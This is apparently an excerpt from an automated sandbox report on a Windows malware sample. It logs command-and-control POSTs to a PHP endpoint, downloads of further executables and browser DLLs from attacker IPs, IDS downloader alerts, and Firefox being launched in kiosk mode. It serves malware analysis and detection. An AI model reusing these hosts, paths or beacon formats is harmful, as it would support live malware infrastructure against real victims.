Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 43 37 36 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42C76B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 43 37 36 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42C76B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 185.215.113.37 185.215.113.37
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49745 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49803 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49742 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49921 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50011 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50039 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50039 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50027 -> 185.215.113.16:80
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16 (this finding is listed 50 times in the report)
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Code function: 6_2_6C61CC60 PR_Recv, 6_2_6C61CC60
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD5B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD5B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN 'www.' || :strippedURL AND 'www.' || :strippedURL || X'FFFF'moz-extension://31bc1824-4b8f-4b01-9a19-e1bd57d398cf/lib/picture_in_picture_overrides.js[{incognito:null, tabId:null, types:["image"], urls:["https://smartblock.firefox.etp/facebook.svg", "https://smartblock.firefox.etp/play.svg"], windowId:null}, ["blocking"]]Could not access the AddonManager to upgrade the profile. This is most likely because the upgrader is being run from an xpcshell test where the AddonManager is not initialized.sharing,pictureinpicture,crashed,busy,soundplaying,soundplaying-scheduledremoval,pinned,muted,blocked,selected=visuallyselected,activemedia-blocked,indicator-replaces-faviconX! equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "*://www.facebook.com/platform/impression.php*" equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2844813161.000001E3C8790000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://www.facebook.com/video" --no-default-browser-check --disable-popup-blocking equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2844813161.000001E3C8790000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://www.facebook.com/video" --no-default-browser-check --disable-popup-blockingR equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.2855650550.000001D34DA70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.facebook.com/video --no-default-browser-check --disable-popup-blocking --attempting-deelevation equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.2855650550.000001D34DA70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.facebook.com/video --no-default-browser-check --disable-popup-blocking --attempting-deelevation9 equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2955106076.000001E752C6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2954167223.000001E752A30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.facebook.com/video --no-default-browser-check --disable-popup-blocking equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2954167223.000001E752A30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.facebook.com/video --no-default-browser-check --disable-popup-blockingg equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php**://*.adsafeprotected.com/jsvid?**://pubads.g.doubleclick.net/gampad/*xml_vmap1**://*.adsafeprotected.com/*/imp/*executeIDB/promise</transaction.onabort equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2974606521.000001E75FD82000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Wikipedia&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Reddit&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Twitter&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.2953836439.000001E7529D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: -os-restarted --kiosk https://www.facebook.com/video --no-default-browser-check --disable-popup-blockingH equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3007396139.000001E765053000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2963529504.000001E75E53C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3001116838.000001E764D10000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/video equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2997633717.000001E763CAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E7639ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2959104555.000001E754590000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=--kioskMOZ_CRASHREPORTER_RESTART_ARG_2=https://www.facebook.com/videoMOZ_CRASHREPORTER_RESTART_ARG_3=--no-default-browser-checkMOZ_CRASHREPORTER_RESTART_ARG_4=--disable-popup-blockingMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\WindowsP equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2844813161.000001E3C8790000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exe--kioskhttps://www.facebook.com/video--no-default-browser-check--disable-popup-blocking equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2954167223.000001E752A30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exe--kioskhttps://www.facebook.com/video--no-default-browser-check--disable-popup-blocking% equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.2855650550.000001D34DA79000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exe--kioskhttps://www.facebook.com/video--no-default-browser-check--disable-popup-blocking--attempting-deelevation equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.2844813161.000001E3C8790000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://www.facebook.com/video" --no-default-browser-check --disable-popup-blockingC:\Program Files\Mozilla Firefox\firefox.exewinsta0\default equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.2855650550.000001D34DA70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.facebook.com/video --no-default-browser-check --disable-popup-blocking --attempting-deelevationC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default} equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2954167223.000001E752A30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.facebook.com/video --no-default-browser-check --disable-popup-blockingC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default# equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: FileUtils_openSafeFileOutputStreampictureinpicture%40mozilla.org:1.0.0FileUtils_closeSafeFileOutputStream*://www.everestjs.net/static/st.v3.js*@mozilla.org/network/file-output-stream;1*://pub.doubleverify.com/signals/pub.js**://track.adform.net/serving/scripts/trackpoint/@mozilla.org/addons/addon-manager-startup;1resource://gre/modules/addons/XPIProvider.jsm*://c.amazon-adsystem.com/aax2/apstag.js*://auth.9c9media.ca/auth/main.js*://static.chartbeat.com/js/chartbeat_video.js*://*.imgur.com/js/vendor.*.bundle.jshttps://smartblock.firefox.etp/play.svg*://cdn.branch.io/branch-latest.min.js**://connect.facebook.net/*/sdk.js**://libs.coremetrics.com/eluminate.jsFileUtils_closeAtomicFileOutputStream*://web-assets.toggl.com/app/assets/scripts/*.js*://connect.facebook.net/*/all.js*resource://gre/modules/FileUtils.sys.mjs@mozilla.org/network/atomic-file-output-stream;1*://static.chartbeat.com/js/chartbeat.js*://static.criteo.net/js/ld/publishertag.jshttps://smartblock.firefox.etp/facebook.svg*://*.imgur.io/js/vendor.*.bundle.jswebcompat-reporter%40mozilla.org:1.5.1webcompat-reporter@mozilla.org.xpiFileUtils_openAtomicFileOutputStream*://www.rva311.com/static/js/main.*.chunk.js@mozilla.org/network/safe-file-output-stream;1*://www.google-analytics.com/analytics.js**://www.google-analytics.com/plugins/ua/ec.js*://s0.2mdn.net/instream/html5/ima3.js*://www.googletagservices.com/tag/js/gpt.js**://adservex.media.net/videoAds.js**://www.google-analytics.com/gtm/js**://*.moatads.com/*/moatheader.js**://cdn.optimizely.com/public/*.js*://js.maxmind.com/js/apis/geoip2/*/geoip2.js*://s.webtrends.com/js/advancedLinkTracking.js*://ssl.google-analytics.com/ga.js*://imasdk.googleapis.com/js/sdkloader/ima3.js*://static.adsafeprotected.com/iasPET.1.js*://*.vidible.tv/*/vidible-min.js**://cdn.adsafeprotected.com/iasPET.1.js*://s.webtrends.com/js/webtrends.js*://s.webtrends.com/js/webtrends.min.js*://pagead2.googlesyndication.com/tag/js/gpt.js*resource://gre/modules/ConduitsParent.sys.mjs equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2955106076.000001E752C03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2954167223.000001E752A40000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2959104555.000001E754590000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_2=https://www.facebook.com/video equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2959104555.000001E7545E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: WinSta0\Default4=::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=--kioskMOZ_CRASHREPORTER_RESTART_ARG_2=https://www.facebook.com/videoMOZ_CRASHREPORTER_RESTART_ARG_3=--no-default-browser-checkMOZ_CRASHREPORTER_RESTART_ARG_4=--disable-popup-blockingMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B0F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", 